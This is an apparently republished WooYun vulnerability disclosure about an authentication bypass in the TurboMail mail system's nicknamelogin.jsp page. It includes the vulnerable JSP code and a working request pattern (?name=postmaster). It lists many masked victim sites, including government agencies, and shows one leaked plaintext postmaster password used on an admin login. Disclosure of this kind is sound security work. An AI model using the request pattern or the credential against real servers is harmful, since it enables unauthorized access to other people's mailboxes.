TurboMail邮件系统任意账号登录漏洞（附众多案例）

2015年6月30日20:27:58评论663 views字数 275阅读0分55秒阅读模式

摘要

2014-10-06：细节已通知厂商并且等待厂商处理中
2014-10-11：厂商已经确认，细节仅向厂商公开
2014-10-14：细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2014-12-05：细节向核心白帽子及相关领域专家公开
2014-12-15：细节向普通白帽子公开
2014-12-25：细节向实习白帽子公开
2015-01-02：细节向公众公开

漏洞概要关注数(14) 关注此漏洞

缺陷编号： WooYun-2014-78331

漏洞标题： TurboMail邮件系统任意账号登录漏洞（附众多案例）

漏洞作者： error

提交时间： 2014-10-06 21:24

公开时间： 2015-01-02 21:26

漏洞类型：非授权访问/权限绕过

危害等级：高

自评Rank： 20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：设计缺陷/边界绕过敏感接口缺乏认证认证缺陷设计不当导致攻击界面扩大

6人收藏

漏洞详情

披露状态：

简要描述：

TurboMail邮件系统某处接口验证不严，导致任意账号登陆漏洞，同时还泄露账号的明文密码。

详细说明：

官网：http://**.**.**.**/

百度搜索：Powered by TurboMail 可以发现用户量还是很大的

漏洞文件：/nicknamelogin.jsp

code 区域

漏洞代码如下：
 <%    
     //传入的是昵称
     String name = request.getParameter("name");
  name = Util.formatRequest(name,MailMain.s_os,"GBK"); 
      
  //http://localhost:8080/mailmain?type=login&uid=test&pwd=test&domain=**.**.**.**
  String uid = null;
  String domain = null;
  String pwd = null;
  
  UserAccountList ual = new UserAccountList();
  try {
   ual.init(null, 0, null, 0,
     MailMain.s_config.UsersPerPage, 1, null,
     "first_name", name, null,true);
 
   int iSize = ual.alUserAccount.size();
   if (iSize > 0) {
    UserAccount ua = (UserAccount) ual.alUserAccount
      .get(0);
    
    if(ua != null){
     uid = ua.username;
     domain = ua.m_domain;
     pwd = ua.getOrgPassword();
    }
   }
  } catch (Exception e) {
 
  }
 
  if(uid != null){
   response.sendRedirect("mailmain?type=login&uid=" + uid + "&pwd="+ pwd + "&domain=" + domain + "&style=enterprise");
  }else{
   %>找不到该用户<% 
  }
 %>

code 区域

代码实现上仅仅通过参数name来查询邮箱用户信息，如果存在就将该用户的标示uid = ua.username;用户的域domain = ua.m_domain;用户的明文密码pwd = ua.getOrgPassword();直接取出，然后使用这些信息进行重定向到登录界面mailmain?type=login&uid=&pwd=&domain=

code 区域

整个过程确实密码的验证，只是简单的判断了下是否存在给定的邮箱账号，导致任意邮箱账号登录，同时在这个过程中还直接泄露了该邮箱账号对于的域名domain和明文密码等敏感信息。

code 区域

通过直接访问/nicknamelogin.jsp页面，即不给name赋值，默认会返回邮箱账号的第一个账号

漏洞证明：

code 区域

测试案例： http://**.**.**.**:100/nicknamelogin.jsp 国家粮食局 **.**.**.**/nicknamelogin.jsp?name=postmaster 贵州省煤矿设计研究院 **.**.**.**/nicknamelogin.jsp 河南省人民政府国有资产监督管理委员会 **.**.**.**/nicknamelogin.jsp?name=postmaster 东方银行业高级管理人员研修院 http://**.**.**.**/nicknamelogin.jsp?name=postmaster 虽然登录失败，但是返回的url链接直接泄露明文密码：http://**.**.**.**/mailmain?type=login&uid=postmaster&pwd=S!r+v1538dcc&domain=root&style=enterprise 使用获取到的postmaster账号密码S!r+v1538dcc到域管理页面登陆: http://**.**.**.**/maintlogin.jsp **.**.**.**/nicknamelogin.jsp **.**.**.**/nicknamelogin.jsp http://**.**.**.**:8080/nicknamelogin.jsp http://**.**.**.**/nicknamelogin.jsp http://**.**.**.**/nicknamelogin.jsp http://**.**.**.**/nicknamelogin.jsp http://**.**.**.**/nicknamelogin.jsp http://**.**.**.**/nicknamelogin.jsp http://**.**.**.**/nicknamelogin.jsp

http://**.**.**.**/nicknamelogin.jsp http://**.**.**.**/nicknamelogin.jsp?name=postmaster

修复方案：

加强验证

版权声明：转载请注明来源 error@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：17

确认时间：2014-10-11 15:03

厂商回复：

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2015-01-14 13:03 | HackBraid ( 核心白帽子 | Rank:1914 漏洞数:208 | 最近有人冒充该账号行骗，任何自称HackBrai...)

1

权限控制不行

1# 回复此人

漏洞概要 关注数(14) 关注此漏洞

缺陷编号： WooYun-2014-78331

漏洞标题： TurboMail邮件系统任意账号登录漏洞（附众多案例）

相关厂商： 国家互联网应急中心

漏洞作者： error

提交时间： 2014-10-06 21:24

公开时间： 2015-01-02 21:26

漏洞类型： 非授权访问/权限绕过

危害等级： 高

自评Rank： 20

漏洞状态： 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 设计缺陷/边界绕过 敏感接口缺乏认证 认证缺陷 设计不当导致攻击界面扩大

6人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 error@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(14) 关注此漏洞

相关厂商：国家互联网应急中心

漏洞类型：非授权访问/权限绕过

危害等级：高

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签：设计缺陷/边界绕过敏感接口缺乏认证认证缺陷设计不当导致攻击界面扩大

漏洞评价(共0人评价):

登陆后才能进行评分